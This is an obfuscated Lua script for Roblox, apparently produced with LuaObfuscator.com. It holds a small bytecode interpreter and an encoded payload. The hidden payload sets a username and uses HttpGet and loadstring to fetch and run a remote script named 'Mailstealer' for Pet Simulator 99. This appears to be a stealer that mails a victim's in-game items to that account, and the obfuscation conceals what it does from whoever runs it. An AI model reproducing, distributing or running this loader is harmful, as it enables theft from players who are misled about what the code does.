--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/((5 -3)^(v32-(1 -(1065 -(68 + 997))))))%((4 -2)^(((v33-((1890 -(226 + 1044)) -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v82-(v82%(928 -(214 + 713))) ;end end else local v83=(0 -0) + 0 ;local v84;while true do if (v83==(0 + 0)) then v84=(879 -(282 + 595))^(v32-((1755 -(32 + 85)) -(1523 + 114))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + (9 -5) ;return (v37 * (31011612 -14234396)) + (v36 * (14533 + 51003)) + (v35 * ((786 -(67 + 113)) -(87 + 263))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=977 -(553 + 424) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==3) then v45=nil;while true do local v89=0 -0 ;while true do if (v89~=0) then else if (v39~=(1 -0)) then else v43={v40,v41,nil,v42};v44=v24();v45={};v39=2 + 0 ;end if (v39==(0 -0)) then local v97=1824 -(1195 + 629) ;local v98;while true do if (v97==(0 -0)) then v98=241 -(187 + 54) ;while true do if (v98==(781 -(162 + 618))) then v42={};v39=1 + 0 ;break;end if (v98==(0 + 0)) then local v164=0 + 0 ;while true do if (v164==(0 -0)) then v40={};v41={};v164=1 + 0 ;end if ((1 -0)==v164) then v98=1;break;end end end end break;end end end v89=1 + 0 ;end if (v89~=1) then else if (v39==(2 + 0)) then for v101=1637 -(1373 + 263) ,v44 do local v102=1000 -(451 + 549) ;local v103;local v104;local v105;local v106;while true do if (v102~=(1 + 1)) then else while true do if (v103~=(0 -0)) then else local v165=0 -0 ;local v166;while true do if (v165~=(1384 -(746 + 638))) then else v166=0;while true do if (v166==(0 + 0)) then v104=0 -0 ;v105=nil;v166=342 -(218 + 123) ;end if (v166~=(1582 -(1535 + 46))) then else v103=1 + 0 ;break;end end break;end end end if (v103==1) then v106=nil;while true do if (v104==(0 + 0)) then local v170=560 -(306 + 254) ;while true do if (v170==(238 -(64 + 174))) then local v173=0 + 0 ;local v174;while true do if (v173==(0 + 0)) then v174=0 -0 ;while true do if (v174~=(1468 -(899 + 568))) then else v170=1 + 0 ;break;end if (v174~=(0 -0)) then else local v183=0;while true do if (v183~=(604 -(268 + 335))) then else v174=217 -(42 + 174) ;break;end if (v183~=(290 -(60 + 230))) then else v105=v22();v106=nil;v183=573 -(426 + 146) ;end end end end break;end end end if (v170==(1 + 0)) then v104=1457 -(282 + 1174) ;break;end end end if (v104~=(1 + 0)) then else if (v105==(1505 -(363 + 1141))) then v106=v22()~=(1580 -(1183 + 397)) ;elseif (v105==2) then v106=v25();elseif (v105==3) then v106=v26();end v45[v101]=v106;break;end end break;end end break;end if (v102==(811 -(569 + 242))) then v103=0;v104=nil;v102=2 -1 ;end if ((1 + 0)==v102) then v105=nil;v106=nil;v102=1026 -(706 + 318) ;end end end v43[3]=v22();for v107=1252 -(721 + 530) ,v24() do local v108=0 + 0 ;local v109;local v110;local v111;local v112;while true do if (v108==2) then while true do if (v109~=0) then else local v167=0;while true do if (v167~=(1 + 0)) then else v109=1272 -(945 + 326) ;break;end if (v167==0) then v110=0;v111=nil;v167=1 + 0 ;end end end if (v109==(2 -1)) then v112=nil;while true do if (v110==1) then while true do if (v111==(1933 -(565 + 1368))) then v112=v22();if (v21(v112,1 + 0 ,1)~=(1661 -(1477 + 184))) then else local v175=700 -(271 + 429) ;local v176;local v177;local v178;local v179;local v180;while true do if (v175~=0) then else local v181=0 + 0 ;while true do if (v181==(1501 -(1408 + 92))) then v175=1 + 0 ;break;end if (v181==(1086 -(461 + 625))) then v176=1288 -(993 + 295) ;v177=nil;v181=1 -0 ;end end end if (v175==(1 + 0)) then local v182=0;while true do if (v182==0) then v178=nil;v179=nil;v182=1172 -(418 + 753) ;end if ((1 + 0)==v182) then v175=306 -(244 + 60) ;break;end end end if (v175==(1 + 1)) then v180=nil;while true do if ((1 + 0)~=v176) then else local v184=0 + 0 ;local v185;while true do if (v184~=(476 -(41 + 435))) then else v185=1001 -(938 + 63) ;while true do if (v185~=(1 + 0)) then else v176=531 -(406 + 123) ;break;end if (v185==(1769 -(1749 + 20))) then local v199=1125 -(936 + 189) ;while true do if (v199~=(1 + 0)) then else v185=1 + 0 ;break;end if (v199==(1613 -(1565 + 48))) then v179=nil;v180=nil;v199=1323 -(1249 + 73) ;end end end end break;end end end if (0==v176) then local v186=0 + 0 ;while true do if (v186==(0 + 0)) then local v187=1145 -(466 + 679) ;while true do if (v187~=1) then else v186=1;break;end if (v187==(0 -0)) then v177=0 -0 ;v178=nil;v187=1901 -(106 + 1794) ;end end end if (v186==(1 + 0)) then v176=1;break;end end end if (v176==2) then while true do if (v177~=(1 + 2)) then else if (v21(v179,3,4 -1 )==(2 -1)) then v180[1879 -(157 + 1718) ]=v45[v180[4]];end v40[v107]=v180;break;end if (v177==2) then local v189=0;local v190;local v191;while true do if (v189==(0 + 0)) then v190=0;v191=nil;v189=3 -2 ;end if (v189==(3 -2)) then while true do if (v190==(0 -0)) then v191=114 -(4 + 110) ;while true do if (v191==0) then local v201=584 -(57 + 527) ;while true do if (v201==(1427 -(41 + 1386))) then if (v21(v179,1,1)==(104 -(17 + 86))) then v180[2]=v45[v180[2 + 0 ]];end if (v21(v179,2,2)~=(1 -0)) then else v180[2 + 1 ]=v45[v180[8 -5 ]];end v201=167 -(122 + 44) ;end if (v201==(2 -1)) then v191=1 -0 ;break;end end end if (v191==(3 -2)) then v177=3;break;end end break;end end break;end end end if (v177~=(1 + 0)) then else local v192=0 + 0 ;local v193;while true do if (v192==(1189 -(449 + 740))) then v193=872 -(826 + 46) ;while true do if (v193~=(1 -0)) then else v177=67 -(30 + 35) ;break;end if (v193~=(0 + 0)) then else local v200=0 + 0 ;while true do if (v200~=0) then else v180={v23(),v23(),nil,nil};if (v178==0) then local v202=0 -0 ;local v203;local v204;while true do if (v202~=1) then else while true do if (v203==(580 -(361 + 219))) then v204=320 -(53 + 267) ;while true do if (v204~=(0 + 0)) then else v180[3]=v23();v180[417 -(15 + 398) ]=v23();break;end end break;end end break;end if (v202==(1205 -(902 + 303))) then v203=0;v204=nil;v202=1;end end elseif (v178==(983 -(18 + 964))) then v180[11 -8 ]=v24();elseif (v178==(2 + 0)) then v180[2 + 1 ]=v24() -(2^16) ;elseif (v178~=3) then else local v211=0 -0 ;while true do if (v211==0) then v180[1 + 2 ]=v24() -((852 -(20 + 830))^(13 + 3)) ;v180[4]=v23();break;end end end v200=1;end if (v200~=(127 -(116 + 10))) then else v193=1;break;end end end end break;end end end if (v177==(0 + 0)) then local v194=0;local v195;local v196;while true do if (v194~=(684 -(483 + 200))) then else while true do if (v195==0) then v196=738 -(542 + 196) ;while true do if (v196~=1) then else v177=1 -0 ;break;end if (v196~=0) then else v178=v21(v112,1465 -(1404 + 59) ,8 -5 );v179=v21(v112,4,2 + 4 );v196=1 -0 ;end end break;end end break;end if (v194==(0 + 0)) then v195=0;v196=nil;v194=1 + 0 ;end end end end break;end end break;end end end break;end end break;end if (v110==(0 -0)) then local v172=0;while true do if (v172==(0 -0)) then v111=0 -0 ;v112=nil;v172=1;end if (v172==(1552 -(1126 + 425))) then v110=406 -(118 + 287) ;break;end end end end break;end end break;end if (v108==(1 -0)) then v111=nil;v112=nil;v108=7 -5 ;end if (v108==0) then v109=1121 -(118 + 1003) ;v110=nil;v108=1 + 0 ;end end end v39=3;end if (v39~=(8 -5)) then else local v100=0 -0 ;while true do if (v100~=(0 -0)) then else for v150=378 -(142 + 235) ,v24() do v41[v150-(4 -3) ]=v29();end return v43;end end end break;end end end break;end if (v38==2) then v43=nil;v44=nil;v38=1 + 2 ;end if ((1 + 0)~=v38) then else v41=nil;v42=nil;v38=2;end if (v38==(0 -0)) then v39=0;v40=nil;v38=1;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==((861 -(240 + 619)) + 0)) then v51=v21(v48,(7 + 22) -8 ,19 + 12 );v52=((v21(v48,(310 -115) -(92 + 71) )==(1 + 0 + 0)) and  -1) or (49 -(25 + 23)) ;v46=1 + (1746 -(1344 + 400)) ;end if (v46==(1 -0)) then v49=766 -(574 + 191) ;v50=(v21(v48,1 + 0 ,38 -18 ) * ((4 -2)^(17 + 15))) + v47 ;v46=(1256 -(255 + 150)) -(254 + 595) ;end if (v46==(129 -(55 + 71))) then if (v51==(0 -0)) then if (v50==((1410 + 380) -(573 + 1217))) then return v52 * ((0 + 0) -0) ;else v51=1 + 0 ;v49=0 -0 ;end elseif (v51==(2986 -(714 + 225))) then return ((v50==(0 + 0)) and (v52 * ((1062 -(810 + 251))/(0 -(0 -0))))) or (v52 * NaN) ;end return v8(v52,v51-((1013 -699) + 709) ) * (v49 + (v50/((2 -0)^(585 -(43 + 490))))) ;end if (v46==(733 -(711 + 22))) then v47=v24();v48=v24();v46=3 -(1741 -(404 + 1335)) ;end end end v26=nil;function v26(v53)local v54=0;local v55;local v56;while true do if (v54==(408 -(183 + 223))) then v56={};for v90=1 -0 , #v55 do v56[v90]=v2(v1(v3(v55,v90,v90)));end v54=2 + 1 ;end if (v54==(0 + (0 -0))) then v55=nil;if  not v53 then v53=v24();if (v53==(337 -(10 + 327))) then return "";end end v54=1 + 0 ;end if ((341 -(118 + 220))==v54) then return v6(v56);end if (v54==(1 + 0)) then v55=v3(v16,v19,(v19 + v53) -(450 -((1601 -(711 + 782)) + 341)) );v19=v19 + v53 ;v54=(1 -0) + 1 ;end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (471 -(270 + 199)) );v19=v19 + 1 + 1 ;return (v59 * 256) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v85=v2(v0(v60,16));if v20 then local v92=v5(v85,v20);v20=nil;return v92;else return v85;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v113=v79[2];local v114=v77[v79[3]];v77[v113 + 1 ]=v114;v77[v113]=v114[v79[4]];else v77[v79[2]]();end elseif (v80<=2) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>3) then local v132=v79[2];local v133,v134=v70(v77[v132](v13(v77,v132 + 1 ,v79[3])));v72=(v134 + v132) -1 ;local v135=0;for v152=v132,v72 do local v153=0;while true do if (v153==0) then v135=v135 + 1 ;v77[v152]=v133[v135];break;end end end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=7) then if (v80<=5) then v77[v79[2]]();elseif (v80>6) then v77[v79[2]]=v79[3];else v71=v79[3];end elseif (v80<=8) then v77[v79[2]]=v79[3];elseif (v80==9) then v63[v79[3]]=v77[v79[2]];else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=15) then if (v80<=12) then if (v80>11) then local v121=v79[2];v77[v121]=v77[v121](v13(v77,v121 + 1 ,v72));else do return;end end elseif (v80<=13) then do return;end elseif (v80>14) then v63[v79[3]]=v77[v79[2]];elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=18) then if (v80<=16) then local v123=v79[2];local v124,v125=v70(v77[v123](v13(v77,v123 + 1 ,v79[3])));v72=(v125 + v123) -1 ;local v126=0;for v129=v123,v72 do v126=v126 + 1 ;v77[v129]=v124[v126];end elseif (v80==17) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else local v144=v79[2];local v145=v77[v79[3]];v77[v144 + 1 ]=v145;v77[v144]=v145[v79[4]];end elseif (v80<=19) then local v127=0;local v128;while true do if (v127==0) then v128=v79[2];v77[v128]=v77[v128](v13(v77,v128 + 1 ,v72));break;end end elseif (v80>20) then v71=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657203083O00557365726E616D65030C3O0068696B6D6574313270756879030A3O004C6F61645363722O656E00143O0012083O00013O0026143O000B000100020004063O000B000100120E000100033O00120E000200043O002001000200020005001208000400064O0010000200044O001300013O00024O0001000100010004063O001300010026143O0001000100010004063O00010001001208000100083O001209000100074O0002000100013O001209000100093O0012083O00023O0004063O000100012O000D3O00017O00",v9(),...);
